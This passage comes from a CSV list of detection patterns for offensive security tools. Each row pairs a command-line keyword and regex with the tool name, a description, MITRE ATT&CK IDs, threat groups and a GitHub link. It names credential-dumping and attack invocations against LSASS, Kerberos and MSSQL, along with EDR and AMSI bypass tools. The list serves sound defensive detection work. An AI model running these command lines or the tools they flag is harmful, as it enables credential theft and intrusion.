- T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* mimipy.py*",".{0,1000}\smimipy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* minidump-rs.exe*",".{0,1000}\sminidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* MirrorDump.exe*",".{0,1000}\sMirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "* mmouse-brute.nse*",".{0,1000}\smmouse\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mmouse-exec.nse*",".{0,1000}\smmouse\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* modbus-discover.nse*",".{0,1000}\smodbus\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --mode decrypt --dumpname *.dmp --key *",".{0,1000}\s\-\-mode\sdecrypt\s\-\-dumpname\s.{0,1000}\.dmp\s\-\-key\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --mode dump --name *.exe --handle procexp --obfuscate*",".{0,1000}\s\-\-mode\sdump\s\-\-name\s.{0,1000}\.exe\s\-\-handle\sprocexp\s\-\-obfuscate.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --mode dump --name lsass.exe*",".{0,1000}\s\-\-mode\sdump\s\-\-name\slsass\.exe.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "* --mode proxy --ghidra *--dll *",".{0,1000}\s\-\-mode\sproxy\s\-\-ghidra\s.{0,1000}\-\-dll\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "* -Module kerbdump*",".{0,1000}\s\-Module\skerbdump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* mongodb-brute.nse*",".{0,1000}\smongodb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mongodb-databases.nse*",".{0,1000}\smongodb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mongodb-info.nse*",".{0,1000}\smongodb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* monitor /interval:* /filteruser:*",".{0,1000}\smonitor\s\/interval\:.{0,1000}\s\/filteruser\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* moodlescan -r -u *",".{0,1000}\smoodlescan\s\-r\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -Mouselogger Start*",".{0,1000}\s\-Mouselogger\sStart.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* mouselogger.py*",".{0,1000}\smouselogger\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* mqtt-subscribe.nse*",".{0,1000}\smqtt\-subscribe\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mrinfo.nse*",".{0,1000}\smrinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* MS15-034.nse*",".{0,1000}\sMS15\-034\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* ms17010 -i *",".{0,1000}\sms17010\s\-i\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* ms17010 -n *",".{0,1000}\sms17010\s\-n\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* msfdb run *",".{0,1000}\smsfdb\srun\s\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "* --msfoptions *",".{0,1000}\s\-\-msfoptions\s.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* --msf-path*",".{0,1000}\s\-\-msf\-path.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* msfstaged.exe*",".{0,1000}\smsfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* Mshikaki.cpp*",".{0,1000}\sMshikaki\.cpp.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "* msrpc-enum.nse*",".{0,1000}\smsrpc\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mssql * -u * -p * -M met_inject*",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smet_inject.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* mssql * -u * -p * -M mssql_priv*",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smssql_priv.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* mssql * -u * -p * -M web_delivery *",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sweb_delivery\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* ms-sql-brute.nse*",".{0,1000}\sms\-sql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-config.nse*",".{0,1000}\sms\-sql\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-dac.nse*",".{0,1000}\sms\-sql\-dac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-dump-hashes.nse*",".{0,1000}\sms\-sql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-empty-password.nse*",".{0,1000}\sms\-sql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-hasdbaccess.nse*",".{0,1000}\sms\-sql\-hasdbaccess\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-info.nse*",".{0,1000}\sms\-sql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-ntlm-info.nse*",".{0,1000}\sms\-sql\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-query.nse*",".{0,1000}\sms\-sql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-tables.nse*",".{0,1000}\sms\-sql\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-xp-cmdshell.nse*",".{0,1000}\sms\-sql\-xp\-cmdshell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mtrace.nse*",".{0,1000}\smtrace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* MultiDump.exe*",".{0,1000}\sMultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "* murmur-version.nse*",".{0,1000}\smurmur\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* MutationGate.cpp*",".{0,1000}\sMutationGate\.cpp.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "* mysql-audit.nse*",".{0,1000}\smysql\-audit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-brute.nse*",".{0,1000}\smysql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-databases.nse*",".{0,1000}\smysql\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-dump-hashes.nse*",".{0,1000}\smysql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-empty-password.nse*",".{0,1000}\smysql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-enum.nse*",".{0,1000}\smysql\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* 